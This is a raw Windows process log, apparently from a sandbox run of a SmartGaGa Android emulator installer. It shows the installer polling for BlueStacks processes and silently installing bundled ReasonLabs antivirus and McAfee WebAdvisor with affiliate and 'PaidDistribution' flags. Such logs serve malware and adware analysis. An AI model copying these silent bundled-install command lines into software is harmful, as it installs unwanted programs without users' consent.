"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=132 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7892 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=133 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10892 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=134 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=135 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=136 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8588 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=137 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=138 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=139 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7024 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=141 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11036 /prefetch:1
C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe
"C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\bluestacks-services" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3620 --field-trial-handle=1752,i,6523308688860315722,5279011738345694822,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6648 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=143 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=144 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8340 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=145 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7132 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=146 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=147 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8984 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=148 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=149 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=150 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6888 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9004 /prefetch:8
C:\Users\Admin\Downloads\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.exe
"C:\Users\Admin\Downloads\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.exe"
C:\Users\Admin\AppData\Local\Temp\is-LFFGT.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LFFGT.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp" /SL5="$805EC,839193,832512,C:\Users\Admin\Downloads\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Users\Admin\AppData\Local\Temp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.exe
"C:\Users\Admin\AppData\Local\Temp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.exe" /LANG=en
C:\Users\Admin\AppData\Local\Temp\is-PKQAV.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PKQAV.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp" /SL5="$9043A,839193,832512,C:\Users\Admin\AppData\Local\Temp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.exe" /LANG=en
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=152 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7492 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=153 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9276 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component0.exe
"C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component0.exe" -ip:"dui=50b25195-d6c8-43bb-b2ca-a8bd616967ef&dit=20240630033545&is_silent=true&oc=ZB_RAV_Cross_Solo_Soft&p=58f9&a=100&b=&se=true" -i
C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\saBSI.exe
"C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\saBSI.exe" /affid 91082 PaidDistribution=true CountryCode=GB
C:\Users\Admin\AppData\Local\Temp\yx4yle0s.exe
"C:\Users\Admin\AppData\Local\Temp\yx4yle0s.exe" /silent
C:\Users\Admin\AppData\Local\Temp\7zS0779229A\UnifiedStub-installer.exe
.\UnifiedStub-installer.exe /silent
C:\Program Files\ReasonLabs\Common\rsSyncSvc.exe
"C:\Program Files\ReasonLabs\Common\rsSyncSvc.exe" -i -bn:ReasonLabs -pn:EPP -lpn:rav_antivirus -url:https://update.reasonsecurity.com/v2/live -dt:10
C:\Program Files\ReasonLabs\Common\rsSyncSvc.exe
"C:\Program Files\ReasonLabs\Common\rsSyncSvc.exe" -pn:EPP -lpn:rav_antivirus -url:https://update.reasonsecurity.com/v2/live -bn:ReasonLabs -dt:10
C:\Users\Admin\Downloads\smartgaga-android-emulator-1.1.646.1-installer.exe
"C:\Users\Admin\Downloads\smartgaga-android-emulator-1.1.646.1-installer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\installer.exe
"C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5712 -ip 5712
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 1572
C:\Program Files\McAfee\Temp1169930912\installer.exe
"C:\Program Files\McAfee\Temp1169930912\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5712 -ip 5712
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 2368
C:\Windows\SYSTEM32\regsvr32.exe
regsvr32.exe /s "C:\Program Files\McAfee\WebAdvisor\win32\WSSDep.dll"
C:\Windows\SysWOW64\regsvr32.exe
/s "C:\Program Files\McAfee\WebAdvisor\win32\WSSDep.dll"
C:\Windows\SYSTEM32\regsvr32.exe
regsvr32.exe /s "C:\Program Files\McAfee\WebAdvisor\x64\WSSDep.dll"
C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe
"C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
